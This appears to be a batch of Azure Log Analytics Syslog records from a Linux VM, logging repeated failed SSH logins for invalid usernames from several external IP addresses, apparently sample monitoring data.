+6143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:52,UbuntuDevEnv,2019-06-26 16:43:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,39742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:52,UbuntuDevEnv,2019-06-26 16:43:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:54,UbuntuDevEnv,2019-06-26 16:43:53,auth,UbuntuDevEnv,info,Failed password for invalid user das from 171.8.199.77 port 42896 ssh2,39742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,das,171.8.199.7,42896,,
+6146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:55,UbuntuDevEnv,2019-06-26 16:43:54,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 42896:11: Bye Bye [preauth],39742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,42896,,
+6147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:55,UbuntuDevEnv,2019-06-26 16:43:54,auth,UbuntuDevEnv,info,Disconnected from invalid user das 171.8.199.77 port 42896 [preauth],39742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,das,171.8.199.7,42896,,
+6148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:56,UbuntuDevEnv,2019-06-26 16:43:55,auth,UbuntuDevEnv,info,Invalid user weblogic from 35.154.19.93 port 36032,39757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,35.154.19.9,36032,,
+6149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:56,UbuntuDevEnv,2019-06-26 16:43:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:56,UbuntuDevEnv,2019-06-26 16:43:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:58,UbuntuDevEnv,2019-06-26 16:43:57,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 35.154.19.93 port 36032 ssh2,39757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,35.154.19.9,36032,,
+6152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:58,UbuntuDevEnv,2019-06-26 16:43:57,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 35.154.19.93 port 36032 [preauth],39757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,35.154.19.9,36032,,
+6153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:43:58,UbuntuDevEnv,2019-06-26 16:43:57,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 36032:11: Normal Shutdown, Thank you for playing [preauth]",39757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,36032,,
+6154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:25,UbuntuDevEnv,2019-06-26 16:44:25,auth,UbuntuDevEnv,info,Invalid user weblogic from 35.154.19.93 port 39322,39868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,35.154.19.9,39322,,
+6155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:25,UbuntuDevEnv,2019-06-26 16:44:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:25,UbuntuDevEnv,2019-06-26 16:44:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:27,UbuntuDevEnv,2019-06-26 16:44:27,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 35.154.19.93 port 39322 ssh2,39868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,35.154.19.9,39322,,
+6158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:27,UbuntuDevEnv,2019-06-26 16:44:27,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 35.154.19.93 port 39322 [preauth],39868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,35.154.19.9,39322,,
+6159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:27,UbuntuDevEnv,2019-06-26 16:44:27,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 39322:11: Normal Shutdown, Thank you for playing [preauth]",39868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,39322,,
+6160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:29,UbuntuDevEnv,2019-06-26 16:44:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18  user=backup,39887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,81.0.212.1,,0,
+6161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:31,UbuntuDevEnv,2019-06-26 16:44:31,auth,UbuntuDevEnv,info,Failed password for backup from 81.0.212.18 port 50012 ssh2,39887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,50012,,
+6162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:31,UbuntuDevEnv,2019-06-26 16:44:31,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 50012:11: Bye Bye [preauth],39887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,50012,,
+6163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:31,UbuntuDevEnv,2019-06-26 16:44:31,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 81.0.212.18 port 50012 [preauth],39887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,81.0.212.1,50012,,
+6164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:44:59,UbuntuDevEnv,2019-06-26 16:44:59,auth,UbuntuDevEnv,info,Invalid user web from 35.154.19.93 port 42624,39988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web,35.154.19.9,42624,,
+6165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:00,UbuntuDevEnv,2019-06-26 16:44:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:00,UbuntuDevEnv,2019-06-26 16:44:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:01,UbuntuDevEnv,2019-06-26 16:45:01,auth,UbuntuDevEnv,info,Failed password for invalid user web from 35.154.19.93 port 42624 ssh2,39988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web,35.154.19.9,42624,,
+6168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:01,UbuntuDevEnv,2019-06-26 16:45:01,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 42624:11: Normal Shutdown, Thank you for playing [preauth]",39988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,42624,,
+6169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:01,UbuntuDevEnv,2019-06-26 16:45:01,auth,UbuntuDevEnv,info,Disconnected from invalid user web 35.154.19.93 port 42624 [preauth],39988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web,35.154.19.9,42624,,
+6170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:13,UbuntuDevEnv,2019-06-26 16:45:13,auth,UbuntuDevEnv,info,Invalid user web from 35.154.19.93 port 45904,40074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web,35.154.19.9,45904,,
+6171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:13,UbuntuDevEnv,2019-06-26 16:45:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:13,UbuntuDevEnv,2019-06-26 16:45:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:15,UbuntuDevEnv,2019-06-26 16:45:15,auth,UbuntuDevEnv,info,Failed password for invalid user web from 35.154.19.93 port 45904 ssh2,40074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web,35.154.19.9,45904,,
+6174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:16,UbuntuDevEnv,2019-06-26 16:45:15,auth,UbuntuDevEnv,info,Disconnected from invalid user web 35.154.19.93 port 45904 [preauth],40074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,web,35.154.19.9,45904,,
+6175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:16,UbuntuDevEnv,2019-06-26 16:45:15,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 45904:11: Normal Shutdown, Thank you for playing [preauth]",40074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,45904,,
+6176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:21,UbuntuDevEnv,2019-06-26 16:45:20,auth,UbuntuDevEnv,info,Invalid user dev from 35.154.19.93 port 49194,40099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,35.154.19.9,49194,,
+6177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:21,UbuntuDevEnv,2019-06-26 16:45:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:21,UbuntuDevEnv,2019-06-26 16:45:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:23,UbuntuDevEnv,2019-06-26 16:45:22,auth,UbuntuDevEnv,info,Failed password for invalid user dev from 35.154.19.93 port 49194 ssh2,40099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,35.154.19.9,49194,,
+6180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:23,UbuntuDevEnv,2019-06-26 16:45:22,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 35.154.19.93 port 49194 [preauth],40099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,35.154.19.9,49194,,
+6181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:23,UbuntuDevEnv,2019-06-26 16:45:22,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 49194:11: Normal Shutdown, Thank you for playing [preauth]",40099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,49194,,
+6182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:28,UbuntuDevEnv,2019-06-26 16:45:27,auth,UbuntuDevEnv,info,Invalid user dev from 35.154.19.93 port 52474,40133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,35.154.19.9,52474,,
+6183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:28,UbuntuDevEnv,2019-06-26 16:45:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:28,UbuntuDevEnv,2019-06-26 16:45:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:30,UbuntuDevEnv,2019-06-26 16:45:29,auth,UbuntuDevEnv,info,Failed password for invalid user dev from 35.154.19.93 port 52474 ssh2,40133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,35.154.19.9,52474,,
+6186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:30,UbuntuDevEnv,2019-06-26 16:45:30,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 35.154.19.93 port 52474 [preauth],40133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,35.154.19.9,52474,,
+6187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:30,UbuntuDevEnv,2019-06-26 16:45:30,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 52474:11: Normal Shutdown, Thank you for playing [preauth]",40133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,52474,,
+6188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:35,UbuntuDevEnv,2019-06-26 16:45:35,auth,UbuntuDevEnv,info,Invalid user git from 35.154.19.93 port 55726,40212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,35.154.19.9,55726,,
+6189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:35,UbuntuDevEnv,2019-06-26 16:45:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:35,UbuntuDevEnv,2019-06-26 16:45:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:37,UbuntuDevEnv,2019-06-26 16:45:36,auth,UbuntuDevEnv,info,Failed password for invalid user git from 35.154.19.93 port 55726 ssh2,40212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,35.154.19.9,55726,,
+6192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:37,UbuntuDevEnv,2019-06-26 16:45:37,auth,UbuntuDevEnv,info,Disconnected from invalid user git 35.154.19.93 port 55726 [preauth],40212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,35.154.19.9,55726,,
+6193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:37,UbuntuDevEnv,2019-06-26 16:45:37,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 55726:11: Normal Shutdown, Thank you for playing [preauth]",40212,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,55726,,
+6194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:43,UbuntuDevEnv,2019-06-26 16:45:43,auth,UbuntuDevEnv,info,Invalid user git from 35.154.19.93 port 59012,40244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,35.154.19.9,59012,,
+6195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:43,UbuntuDevEnv,2019-06-26 16:45:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:43,UbuntuDevEnv,2019-06-26 16:45:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:45,UbuntuDevEnv,2019-06-26 16:45:45,auth,UbuntuDevEnv,info,Failed password for invalid user git from 35.154.19.93 port 59012 ssh2,40244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,35.154.19.9,59012,,
+6198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:45,UbuntuDevEnv,2019-06-26 16:45:45,auth,UbuntuDevEnv,info,Disconnected from invalid user git 35.154.19.93 port 59012 [preauth],40244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,35.154.19.9,59012,,
+6199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:45,UbuntuDevEnv,2019-06-26 16:45:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 59012:11: Normal Shutdown, Thank you for playing [preauth]",40244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,59012,,
+6200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:59,UbuntuDevEnv,2019-06-26 16:45:58,auth,UbuntuDevEnv,info,Invalid user analytics from 80.108.220.67 port 44806,40286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,80.108.220.6,44806,,
+6201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:59,UbuntuDevEnv,2019-06-26 16:45:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:45:59,UbuntuDevEnv,2019-06-26 16:45:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,40286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
